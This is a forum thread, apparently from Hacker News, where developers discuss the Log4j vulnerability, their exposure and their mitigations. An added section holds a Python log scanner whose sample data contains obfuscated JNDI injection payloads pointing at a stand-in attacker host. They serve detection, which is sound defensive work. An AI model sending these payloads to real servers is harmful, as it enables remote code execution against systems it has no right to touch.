HACKER Q&A
📣 faizshah

How are you holding up with this Log4j madness?


Seems most of the industry has been rushing out deployments this weekend.


  👤 btown Accepted Answer ✓
We have avoided Java internally, but I am mainly worried that our ecosystem of SaaS tools, service providers, even payment processors might be bleeding data breaches and nobody knows yet.

All it takes is one old ETL script on an unmaintained server that logs user-submitted records once a week, and their internal networks will be backdoored by script kiddies at some point soon, not to mention sophisticated actors. The companies that downsized technical teams during the pandemic simply don’t have the bandwidth to audit their entire security surface - #hugops to anyone being asked to do this. It’s a perfect storm. And we’re only seeing the beginning.

But it’s not like I’m going to use our corporate credentials to probe our own service providers to see which APIs are vulnerable - I have no desire to be banned and sued. And we’re too small an account to be able to do anything but make ourselves sound paranoid to our account managers. So I’m just waiting for the other shoe to drop. I hope it’s not something that splashes onto our reputation.


👤 beanjuiceII
I am relaxing at home, and if my employer wants they could pay me time and a half over the weekend, but I've received no call as of yet :) Sounds like a Monday thing?

👤 ev1
Our applications cannot make outbound connections from logging (they have to go through a specific class/function/service/factory that sets up all the metadata like mTLS, proxy, etc), and any non-mTLS attempts don't work, along with any to "not recognised" endpoints.

I noticed on Thursday thanks to HN and mitigated before 2.15.0 released, and have done nothing all weekend.

I want to know who the fuck on earth actually has a use case of loading a class and running it inline from a logging call rather than calling getUserEmailFromLdap(ou, principal).toString() or something
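
A defender-side check for the lookup strings that abuse the behaviour ev1 describes (a logging call resolving a lookup and loading a remote class), added here as an example and not code from any poster in this thread. It assumes the constructed access-log lines in SAMPLE_LOG and the Log4j 2 lookup syntax (`${lower:}`, `${upper:}`, `${name:-default}`); the function names are my own.

```python
import re
from typing import List, Tuple

# Constructed access-log lines (not real traffic); the last field is the User-Agent.
SAMPLE_LOG = """\
10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"
10.0.0.7 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - "GET /api HTTP/1.1" 200 "${${lower:j}ndi:${::-l}dap://attacker.example/b}"
10.0.0.11 - - "GET /health HTTP/1.1" 200 "${env:HOSTNAME}"
10.0.0.13 - - "GET /x HTTP/1.1" 200 "${${env:NOPE:-j}${::-n}di:rmi://attacker.example/c}"
"""

# An innermost ${...} lookup: no nested "${" and no "}" between the braces.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Fold the lookup tricks used to hide "${jndi:" from naive matching:
    ${lower:X}/${upper:X} case changes and the ${name:-default} form
    (e.g. ${::-j}). Innermost lookups first, repeated to a fixed point."""

    def resolve(m):
        body = m.group(1)
        if ":-" in body:                      # ${anything:-default} -> default
            return body.split(":-", 1)[1]
        name, _, arg = body.partition(":")
        if name.lower() == "lower":
            return arg.lower()
        if name.lower() == "upper":
            return arg.upper()
        return m.group(0)                     # unmodelled lookup (jndi, env): keep

    while True:
        resolved = _INNERMOST.sub(resolve, text)
        if resolved == text:                  # nothing left to fold
            return text
        text = resolved


def find_jndi_probes(log: str) -> List[Tuple[int, str]]:
    """Return (line number, normalized line) for each line that carries a JNDI
    lookup once de-obfuscated. Other ${...} in user-controlled fields are also
    worth a look; this flags only the JNDI form."""
    hits = []
    for n, line in enumerate(log.splitlines(), 1):
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits
```

Run it over real access or application logs by passing the file contents in place of SAMPLE_LOG; the normalized line in each hit shows what the logger would actually have tried to resolve.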


👤 ironmagma
It’s been nice knowing we are using a sane development stack that doesn’t include bloatware.

👤 altdataseller
I haven't heard many companies actually reporting major exploits, or any major sites having outages.

So I'm questioning whether this flaw really does result in remote code execution, or whether the vast majority of companies are using a version of log4j that doesn't have this flaw.


👤 darthrupert
I run nothing on Java so doing "Kermit drinks tea" while looking at news. With a slight dread that what I am using might have similar problems that we don't know yet.